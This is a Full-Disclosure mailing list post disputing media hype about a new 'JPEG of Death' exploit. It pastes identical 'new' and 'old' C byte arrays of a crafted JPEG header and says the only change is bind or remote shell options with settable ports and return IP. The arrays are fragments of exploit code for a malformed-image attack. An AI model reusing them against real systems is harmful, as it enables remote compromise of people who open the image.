umm, no all this has thats different is correct headers for bind or remote shell option. and ability to set ports and return ip in the code, instead of needing to use your own shellcode ( or metasploits ) note: there is no new exploit code or vector
------------------- / snip /----------------- new. char header1[] = "\xFF\xD8\xFF\xE0\x00\x10\x4A\x46\x49\x46\x00\x01\x02\x00\x00\x64" "\x00\x64\x00\x00\xFF\xEC\x00\x11\x44\x75\x63\x6B\x79\x00\x01\x00" "\x04\x00\x00\x00\x0A\x00\x00\xFF\xEE\x00\x0E\x41\x64\x6F\x62\x65" "\x00\x64\xC0\x00\x00\x00\x01\xFF\xFE\x00\x01\x00\x14\x10\x10\x19" "\x12\x19\x27\x17\x17\x27\x32\xEB\x0F\x26\x32\xDC\xB1\xE7\x70\x26" "\x2E\x3E\x35\x35\x35\x35\x35\x3E"; ------------------- / snip /----------------- old. ------------------- / snip /----------------- char header1[]= "\xFF\xD8\xFF\xE0\x00\x10\x4A\x46\x49\x46\x00\x01\x02\x00\x00\x64" "\x00\x64\x00\x00\xFF\xEC\x00\x11\x44\x75\x63\x6B\x79\x00\x01\x00" "\x04\x00\x00\x00\x0A\x00\x00\xFF\xEE\x00\x0E\x41\x64\x6F\x62\x65" "\x00\x64\xC0\x00\x00\x00\x01\xFF\xFE\x00\x01\x00\x14\x10\x10\x19" "\x12\x19\x27\x17\x17\x27\x32\xEB\x0F\x26\x32\xDC\xB1\xE7\x70\x26" "\x2E\x3E\x35\x35\x35\x35\x35\x3E"; ------------------- / snip /----------------- take your media hype and die kthnx, m.wood > the last step before the worm > > http://www.k-otik.com/exploits/09252004.JpegOfDeath.c.php _______________________________________________ Full-Disclosure - We believe in it. Charter: http://lists.netsys.com/full-disclosure-charter.html
